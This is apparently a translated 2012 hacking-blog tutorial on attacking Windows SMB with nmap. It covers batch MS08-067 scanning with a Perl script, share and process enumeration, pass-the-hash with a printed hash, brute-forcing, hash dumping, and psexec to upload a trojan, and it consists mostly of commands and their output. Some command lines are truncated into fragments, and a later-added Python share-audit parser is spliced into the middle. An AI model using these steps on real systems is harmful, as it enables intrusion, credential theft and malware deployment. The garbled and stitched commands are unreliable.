
10 ways to attack Windows SMB

Published: 2012-02-10 09:59  Source: dis9  Author: Aoi Sora
Abstract: Whenever pentesters do a security assessment for a small or medium-sized business, SMB comes to mind. Below is an introduction to the various attacks against SMB....


Every martial art has a weak spot: usually the groin or the eyes, or in special cases the waist or something else; see any Condor Heroes story for details. SMB is that weak spot in miniature.
The SMB (Server Message Block) protocol was defined by Microsoft and Intel in 1987, mainly as the communication protocol for Microsoft networks. SMB sits at the session layer and presentation layer, with a small part at the application layer. It uses the NetBIOS application program interface (API). It is also an open protocol that allows extensions, which has made it large and complex: there are about 65 top-level operations, each with more than 120 functions, and even Windows NT does not support all of them. Microsoft recently renamed SMB to CIFS (Common Internet File System) and added many new features.
 

Starting the attack

Below this noob gives a demonstration; veterans, please fly past.


1 nmap attack

nmap is a powerful scanning tool, and it has other scanning methods as well.

root@Dis9Team:/usr/local/share/nmap/scripts# pwd
/usr/local/share/nmap/scripts
root@Dis9Team:/usr/local/share/nmap/scripts# ls | grep smb
smb-brute.nse
smb-check-vulns.nse
smb-enum-domains.nse
smb-enum-groups.nse
smb-enum-processes.nse
smb-enum-sessions.nse
smb-enum-shares.nse
smb-enum-users.nse
smb-flood.nse
smb-mbenum.nse
smb-os-discovery.nse
smb-psexec.nse
smb-security-mode.nse
smb-server-stats.nse
smb-system-info.nse
smbv2-enabled.nse
root@Dis9Team:/usr/local/share/nmap/scripts#

Checking for vulnerabilities

This uses the NMAP script smb-check-vulns.nse, e.g.:

root@Dis9Team:/# nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 192.168.1.133

[Screenshot: SMB attack methods]

From the screenshot above you can see that 192.168.1.133 (port 139) is vulnerable to MS08-067.
Of course we can also do this in batch (the backslashes in the Perl regexes are restored here; the host regex accepts both the older "Interesting ports on ..." and the newer "Nmap scan report for ..." line):

nmap -p445 --script=smb-check-vulns 192.168.0.*|perl -le 'while(<STDIN>){if(/^(?:Nmap scan report for|Interesting ports on) .*?(\d+\.\d+\.\d+\.\d+)\)?:?$/) { $i = $1;} if(/^\|_?\s+(.*?):\s+VULNERABLE$/ && $i ne ""){ print "$i is vulnerable to $1"; }}'

192.168.0.5 is vulnerable to MS08-067
192.168.0.11 is vulnerable to MS08-067
192.168.0.24 is vulnerable to MS08-067

If you find the command too long, you can use this Perl script instead (the backslashes lost in the original listing are restored, and the host-line regex accepts both old and new Nmap output formats):

#!/usr/bin/perl
# Scan the /24 of the given interface with smb-check-vulns and print vulnerable hosts.
use strict;
use warnings;

my $eth = $ARGV[0];

if (!defined $eth || $eth eq "") {
    print "Usage: smb-check.pl <eth#>\n";
    exit(0);
}

my @ifconfig = `ifconfig $eth`;
my $range;

foreach my $line (@ifconfig) {
    # Take the first three octets of the interface address (a /24 is assumed)
    if ($line =~ /^.*?inet\s+addr:(\d+\.\d+\.\d+)\.\d+.*/) {
        $range = $1;
    }
}

die "Could not determine the IPv4 address of $eth\n" unless defined $range;

open(NMAP, "nmap -p445 --script=smb-check-vulns $range.*|") || die "$!";
my ($i, $vuln) = ("", 0);
while (<NMAP>) {
    chomp;
    # Host line: "Nmap scan report for 1.2.3.4" (Nmap 5+) or "Interesting ports on name (1.2.3.4):" (older)
    if (/^(?:Nmap scan report for|Interesting ports on) .*?(\d+\.\d+\.\d+\.\d+)\)?:?$/) {
        $i = $1;
    }
    # Script result line, e.g. "|  MS08-067: VULNERABLE" ("|_" marks the last line of the block)
    if (/^\|_?\s+(.*?):\s+VULNERABLE$/ && $i ne "") {
        print "$i is vulnerable to $1\n";
        $vuln++;
    }
}
close(NMAP);

if ($vuln == 0) {
    print "No vulnerable hosts found\n";
    exit(0);
}

Information gathering

e.g.:

root@Dis9Team:/# nmap -p445 --script=smb-os-discovery 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 18:55 CST
Nmap scan report for 192.168.1.133
Host is up (0.00051s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-os-discovery:
| OS: Windows Server 2003 3790 (Windows Server 2003 5.2)
| Name: WORKGROUP\DIS9TEAM-6ZL2OS
|_ System time: 2012-02-08 18:55:12 UTC+8

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
root@Dis9Team:/#

Next, let's check whether it has any shares:

root@Dis9Team:/# nmap -p445 --script=smb-enum-shares 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 19:00 CST
Nmap scan report for 192.168.1.133
Host is up (0.00065s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-enum-shares:
| 1
| Anonymous access: <none>
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
root@Dis9Team:/#

OK, there are shared directories.
We can dig a bit deeper:

=123456 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 19:01 CST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:01
Scanning 192.168.1.133 [1 port]
Completed ARP Ping Scan at 19:01, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:01
Completed Parallel DNS resolution of 1 host. at 19:01, 0.24s elapsed
Initiating SYN Stealth Scan at 19:01
Scanning 192.168.1.133 [1 port]
Discovered open port 445/tcp on 192.168.1.133
Completed SYN Stealth Scan at 19:01, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.1.133.
Initiating NSE at 19:01
Completed NSE at 19:01, 0.19s elapsed
Nmap scan report for 192.168.1.133
Host is up (0.00078s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-enum-shares:
| 1
| Type: STYPE_DISKTREE
| Comment: 1
| Users: 0, Max: <unlimited>
| Path: C:\WINDOWS
| Anonymous access: <none>
| Current user ('administrator') access: READ
| ADMIN$
| Type: STYPE_DISKTREE_HIDDEN
| Comment: \xDC\x0B\xA1\x06
| Users: 0, Max: <unlimited>
| Path: C:\WINDOWS
| Anonymous access: <none>
| Current user ('administrator') access: READ/WRITE
| C$
| Type: STYPE_DISKTREE_HIDDEN
| Comment: \xD8\xA4q\xAB
| Users: 0, Max: <unlimited>
| Path: C:\
| Anonymous access: <none>
| Current user ('administrator') access: READ/WRITE
| IPC$
| Type: STYPE_IPC_HIDDEN
| Comment: \xDC\x0B IPC
| Users: 1, Max: <unlimited>
| Path:
| Anonymous access: READ <not a file share>
|_ Current user ('administrator') access: READ <not a file share>

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@Dis9Team:/#
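To turn a listing like the one above into something an audit can act on, here is an added example (not code from the original post) that parses smb-enum-shares output and flags every share that is readable anonymously or writable by the account used for the scan; the sample text is constructed from the output above and the function names are my own.

```python
import re
# Constructed sample modelled on the smb-enum-shares output shown above (lab host, not real data)
SAMPLE = """\
Nmap scan report for 192.168.1.133
| smb-enum-shares:
|   1
|     Path: C:\\WINDOWS
|     Anonymous access: <none>
|     Current user ('administrator') access: READ
|   C$
|     Type: STYPE_DISKTREE_HIDDEN
|     Anonymous access: <none>
|     Current user ('administrator') access: READ/WRITE
|   IPC$
|     Anonymous access: READ <not a file share>
|_    Current user ('administrator') access: READ <not a file share>
"""

HOST_RE = re.compile(r"^Nmap scan report for .*?(\d+\.\d+\.\d+\.\d+)\)?$")
SHARE_RE = re.compile(r"^\|_?\s+([^\s:]+)$")  # a bare share name line such as "|   C$"
FIELD_RE = re.compile(r"^\|_?\s+(Type|Path|Anonymous access|Current user \('([^']*)'\) access):\s*(.*)$")

def parse_enum_shares(text):
    # Returns {ip: {share: {"type", "path", "anonymous", "user", "user_access"}}}
    hosts, host, share = {}, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, share = hosts.setdefault(m.group(1), {}), None
        elif host is not None and (m := SHARE_RE.match(line)):
            share = host.setdefault(m.group(1), {})
        elif share is not None and (m := FIELD_RE.match(line)):
            field, user, value = m.groups()
            if user is not None:  # "Current user ('x') access: ..." line
                share["user"], share["user_access"] = user, value
            else:
                share[field.split()[0].lower()] = value
    return hosts

def exposed_shares(hosts):
    # Audit view: shares readable anonymously or writable by the account used for the scan
    findings = []
    for ip, shares in hosts.items():
        for name, info in shares.items():
            anon = info.get("anonymous", "<none>")
            if not anon.startswith("<none>"):
                findings.append((ip, name, "anonymous " + anon.split()[0]))
            if "WRITE" in info.get("user_access", ""):
                findings.append((ip, name, info.get("user", "?") + " " + info["user_access"]))
    return findings
```

Feed it the normal-format output of a whole range scan and every host gets its own entry, so the findings list is the exposure report for the subnet.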

The scan gave us a lot of information. If during a pentest you only obtained a hash and could not crack the password, you can also batch-scan with the hash, dear:

root@Dis9Team:/# nmap -v -p445 --script=smb-enum-shares --script-args=smbuser=administrator,smbhash=32ed87bdb5fdc5e9cba88547376818d4 192.168.1.133

[Screenshot: SMB attack methods]

Reading the share contents:

ass=123456 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 19:17 CST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:17
Scanning 192.168.1.133 [1 port]
Completed ARP Ping Scan at 19:17, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:17
Completed Parallel DNS resolution of 1 host. at 19:17, 0.04s elapsed
Initiating SYN Stealth Scan at 19:17
Scanning 192.168.1.133 [1 port]
Discovered open port 445/tcp on 192.168.1.133
Completed SYN Stealth Scan at 19:17, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.1.133.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.39s elapsed
Nmap scan report for 192.168.1.133
Host is up (0.00056s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-enum-processes:
|
| `+-Idle
| | `-System
| | `-smss
| | `+-csrss
| | `-winlogon
| | `+-services
| | | `+-TPAutoConnSvc
| | | | `-TPAutoConnect
| | | +-dllhost
| | | +-vmacthlp
| | | +-spoolsv
| | | +-msdtc
| | | +-svchost
| | | +-vmtoolsd
| | | `-dfssvc
| | `-lsass
| +-explorer
| | `+-VMwareTray
| | +-ctfmon
| | `-cmd
| | `-conime
|_ `-wmiprvse

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@Dis9Team:/#

Brute forcing

Can nmap brute-force? It can even brute-force a WordPress admin login; I'll share that next time.
e.g.:

nmap --script=smb-brute --script-args=userdb=/tmp/帐号字典.txt,passdb=/tmp/密码字典.txt IP地址 -p 445

[Screenshot: SMB attack methods]

From the screenshot above you can see... you know....
 

Dumping hashes

Above we brute-forced an SMB account; if it has SYSTEM privileges, we can dump the hashes!

root@Dis9Team:/# nmap -p445 --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=test 192.1.1.133

But in the new version this script is gone. Oh yeah~ The tragic part is that I have a backup~
psexec

Everyone is familiar with psexec, right? NMAP can do that too.
Command:

root@Dis9Team:/# nmap --script smb-psexec.nse --script-args=smbuser=帐号,smbpass=密码,config=配置 -p445 IP

PSEXEC's default configs are in: /usr/local/share/nmap/nselib/data/psexec
When you use it you need to download

wget http://nmap.org/psexec/nmap_service.exe

into the PSEXEC config directory.
Here is a demo:

root@Dis9Team:/# nmap --script smb-psexec.nse --script-args=smbuser=administrator,smbpass=123456,config=network.lua -p445 192.168.1.133

[Screenshot: SMB attack methods]

The config I used is network.lua; you can look at its contents yourselves.
Next I'll write my own lua file
and upload my own trojan:

root@Dis9Team:/# nmap --script smb-psexec.nse --script-args=smbuser=administrator,smbpass=123456,config=test -p445 192.168.1.133

^_^ It worked.

[Screenshot: SMB attack methods]

Reference: root@Dis9Team:/usr/local/share/nmap/nselib/data/psexec# cat pwdump.lua

Tags: SMB attacks, system attacks
